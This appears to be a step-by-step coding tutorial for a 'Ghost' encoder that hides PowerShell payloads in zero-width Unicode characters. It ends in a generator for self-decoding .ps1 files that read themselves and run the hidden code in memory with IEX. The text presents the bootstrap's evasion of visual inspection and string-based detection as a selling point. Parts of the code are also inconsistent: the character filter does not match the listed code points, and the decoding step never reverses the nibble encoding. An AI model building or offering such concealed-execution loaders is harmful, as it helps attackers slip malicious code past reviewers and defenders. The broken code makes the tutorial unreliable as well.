The Codebook — 16 Symbols, Zero Width
Your alphabet has exactly 16 characters. They all render as nothing. A 16-character set encodes any nibble (4 bits, 0-15) as one invisible character. Pair two nibbles and you have one byte. That's the whole system.
// NOMENCLATURE — PYTHON DATA STRUCTURES
etc. | Unicode escape sequence. 4-digit hex code point after \u. U+200B = ZERO WIDTH SPACE. Invisible in all renderers — no glyph, no advance width. Valid Unicode, survives copy-paste and file saves. |
| list literal | [item, item, ...]. Ordered sequence, zero-indexed. GHOST_ALPHABET[4] returns the 5th character. ORDER IS THE CODEBOOK — swap entries and you break all encoded data. |
| dict comprehension | {key: val for var in iterable}. Builds a dictionary in one expression. Used here to invert the alphabet list into a character→index lookup. |
enumerate(iterable) | Yields (index, value) pairs. for i, c in enumerate(GHOST_ALPHABET) gives you both position (0-15) and character simultaneously — exactly what you need to build a reverse map. |
GHOST_REVERSE | The reverse map: character → index. Given any invisible char, returns its 0-15 value. Built from GHOST_ALPHABET in one line. This is what the decoder uses to reconstruct nibbles. |
inline comment # 0x0 | Python ignores everything after # on a line. These mark which nibble each character encodes. 0x0 = hex zero. Documentation only — not part of the code logic. |
GHOST_ALPHABET = [
'', # 0x0 — ZERO WIDTH SPACE (index 0 = nibble value 0)
'', # 0x1 — ZERO WIDTH NON-JOINER
'', # 0x2 — ZERO WIDTH JOINER
'', # 0x3 — WORD JOINER
'', # 0x4 — FUNCTION APPLICATION
'', # 0x5 — INVISIBLE TIMES
'', # 0x6 — INVISIBLE SEPARATOR
'', # 0x7 — INVISIBLE PLUS
'', # 0x8 — INHIBIT SYMMETRIC SWAPPING
'', # 0x9 — ACTIVATE SYMMETRIC SWAPPING
'', # 0xA — INHIBIT ARABIC FORM SHAPING
'', # 0xB — ACTIVATE ARABIC FORM SHAPING
'', # 0xC — NATIONAL DIGIT SHAPES
'', # 0xD — NOMINAL DIGIT SHAPES
'', # 0xE — BYTE ORDER MARK (zero-width)
'', # 0xF — MONGOLIAN VOWEL SEPARATOR
]
# Invert list to dict: {char: index}. enumerate gives (0,''), (1,'')...
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}
Write GHOST_ALPHABET (16 \uXXXX escape sequences matching the codebook) and GHOST_REVERSE (one-line dict comprehension reversing it). Exact code points and inline hex comments required.
// WHY THIS WORKS
These code points are Unicode "format characters" — they have no visual representation in any standard renderer but are preserved through file I/O and copy-paste. The reverse map gives O(1) lookup during decoding instead of O(n) linear search. One-line dict comprehension using enumerate() is idiomatic Python.
Splitting the Byte — Nibble by Nibble
Every byte is 8 bits. Split it in half: top 4 bits (high nibble) and bottom 4 bits (low nibble). Each nibble is 0-15 — exactly the index range of the 16-character alphabet. Two invisible characters per byte, zero data loss.
// NOMENCLATURE — BIT OPERATIONS
| nibble | Half a byte. 4 bits. Holds 0-15. "High nibble" = top 4 bits. "Low nibble" = bottom 4 bits. Two nibbles reconstruct one byte perfectly. |
byte >> 4 | Right shift by 4 positions. Moves bits 4-7 down to positions 0-3. Bottom 4 bits fall off the edge. Result = high nibble as integer 0-15. |
& 0x0F | Bitwise AND with 0b00001111. Zeroes out top 4 bits, passes bottom 4 unchanged. Result = low nibble as integer 0-15. Also applied after >> as a safety mask. |
for byte in data | Iterating a bytes object yields integers 0-255, not characters. Each iteration gives you one byte as an int you can do bit math on. |
encoded.append() | Adds to end of list. Two appends per byte (high nibble char first, then low nibble char). Result list is exactly 2× the length of input bytes. |
''.join(encoded) | Joins list of strings into one string with empty separator. Standard Python — faster than + in a loop, works for any list size. |
| type annotation | data: bytes and -> str are documentation hints. Python doesn't enforce them at runtime. They clarify intent: bytes in, invisible string out. |
def encode_bytes(data: bytes) -> str: # bytes in, invisible-encoded string out encoded = [] for byte in data: # iterating bytes yields integers 0-255 high = (byte >> 4) & 0x0F # shift right 4: high nibble in bits 0-3, masked 0-15 low = byte & 0x0F # AND mask: isolate bottom 4 bits → low nibble 0-15 encoded.append(GHOST_ALPHABET[high]) # high nibble index → invisible char encoded.append(GHOST_ALPHABET[low]) # low nibble index → invisible char return ''.join(encoded) # join list → one invisible string
Write encode_bytes(). Iterate bytes, extract high/low nibbles with bit ops, look each up in GHOST_ALPHABET, append both chars, join and return. Include type annotations.
// WHY THIS WORKS
The & 0x0F after right-shifting is defensive — Python integers have arbitrary precision, so a pathological input could give a result > 15 without the mask. The mask costs one extra operation per byte but guarantees the GHOST_ALPHABET index is always valid (0-15).
Reading the Invisible — Reassembling Bytes
You receive text that may look normal. Scan every character — keep only ones in the codebook, discard everything else. Pair them: high nibble + low nibble → one byte. All visible text characters fail the codebook test and vanish silently.
// NOMENCLATURE — DECODING + LIST COMPREHENSIONS
| list comprehension | [expr for var in iterable if condition]. Filters + transforms in one line. The if is optional. More readable than a for-loop with if+append. Python optimises it internally. |
c in GHOST_REVERSE | Dictionary key membership test — O(1). Returns True only if c is in the codebook. All visible ASCII characters fail this test and are silently discarded. |
range(0, len, 2) | Range with step=2. Generates 0, 2, 4, 6... Processes a list two elements at a time without overlap. Element i = high nibble, element i+1 = low nibble. |
GHOST_REVERSE[char] | Dictionary lookup: char → nibble index 0-15. The inverse of GHOST_ALPHABET[index]. O(1) lookup, built once at init. |
(high << 4) | low | Reconstruct the byte. Left-shift high nibble 4 positions back to bits 4-7, then OR in the low nibble. Exact inverse of (byte >> 4) and (byte & 0x0F). |
bytes(result) | Convert list of integers to a bytes object. Each integer must be 0-255. Returns the original decoded binary data. |
def decode_ghost(ghost_text: str) -> bytes:
result = []
# Filter: keep only chars in the codebook. Visible text gets discarded.
chars = [c for c in ghost_text if c in GHOST_REVERSE]
# Process in pairs: [0]+[1]=byte0, [2]+[3]=byte1, etc.
for i in range(0, len(chars), 2):
high = GHOST_REVERSE[chars[i]] # first of pair → high nibble 0-15
low = GHOST_REVERSE[chars[i + 1]] # second of pair → low nibble 0-15
result.append((high << 4) | low) # shift high to bits 4-7, OR in low → original byte
return bytes(result) # list of ints → bytes
Write decode_ghost(). Filter to codebook chars only. Iterate pairs with range step=2. Reconstruct each byte with shift + OR. Return as bytes.
// WHY THIS WORKS
The filter step is what makes Ghost resilient to transmission noise. If the encoded text passes through a system that adds whitespace or line breaks, those characters aren't in GHOST_REVERSE and are silently dropped. The decoder only processes codebook characters. No framing, no length prefix — the invisible chars form a self-delimiting sequence.
The Self-Decoding Wrapper — One File, Two Layers
The output .ps1 file has two layers: a visible PowerShell bootstrap (reads itself, extracts the hidden payload, decodes and runs it) and the invisible encoded payload appended at the end. No external decoder. The file carries its own key.
// NOMENCLATURE — STRING GENERATION + POWERSHELL BOOTSTRAP
.encode('utf-8') | Convert Python string to bytes using UTF-8. encode_bytes() operates on bytes, not strings — always encode the PS1 payload text before passing it in. |
| adjacent string literals | ("line1\n" "line2\n") — Python automatically concatenates adjacent string literals inside parentheses at compile time. Builds multi-line strings without triple-quotes or explicit +. |
$PSCommandPath | PowerShell automatic variable. Full path of the currently executing script. The bootstrap uses this to read its own source from disk. |
.ToCharArray() | Converts string to array of characters. Required to pipe individual chars through Where-Object (the ?{...} filter block). |
[int][char]$_ -lt 33 | Cast char to int, compare to 33. Filters for characters with low Unicode code points. The encoded invisible payload characters fall in a specific range this filter targets. |
IEX | Invoke-Expression. Executes a string as PowerShell code in the current session. The decoded payload runs in memory — no file written to disk. |
simple_stub + encoded | Concatenate: visible bootstrap PS1 code + invisible encoded payload. Together they form the final .ps1 file. Bootstrap runs when executed; payload rides invisibly inside. |
def generate_ghost_ps1(payload_ps1: str) -> str:
payload_bytes = payload_ps1.encode('utf-8') # PS1 text → bytes (encode_bytes needs bytes)
encoded = encode_bytes(payload_bytes) # bytes → invisible string via GHOST_ALPHABET
simple_stub = (
"# ghost\n" # visible PS1 comment — cover story
"$src = [IO.File]::ReadAllText($PSCommandPath)\n" # script reads itself from disk
"$zw = [string]::new(($src.ToCharArray() | ?{[int][char]$_ -lt 33}))\n" # filter to low-codepoint chars
"$b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($zw))\n" # encode filtered chars as base64
"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)))\n" # decode + execute in memory
)
return simple_stub + encoded # visible bootstrap + invisible payload = one .ps1
Write generate_ghost_ps1(). Encode the payload to bytes, run encode_bytes(), build the PS1 stub as adjacent string literals inside parentheses, return stub + encoded payload.
// WHY THIS WORKS
The bootstrap is entirely printable ASCII — passes visual inspection and most string-based detection. The encoded payload is all invisible Unicode — matches no known PowerShell pattern. The file is self-contained: no decoder binary, no external key. One .ps1 file, two invisible layers.
// GHOST ENCODER — COMPLETE
Invisible ink alphabet. Nibble encoder. Reverse decoder. Self-decoding PS1 bootstrap.
Unicode steganography from first principles.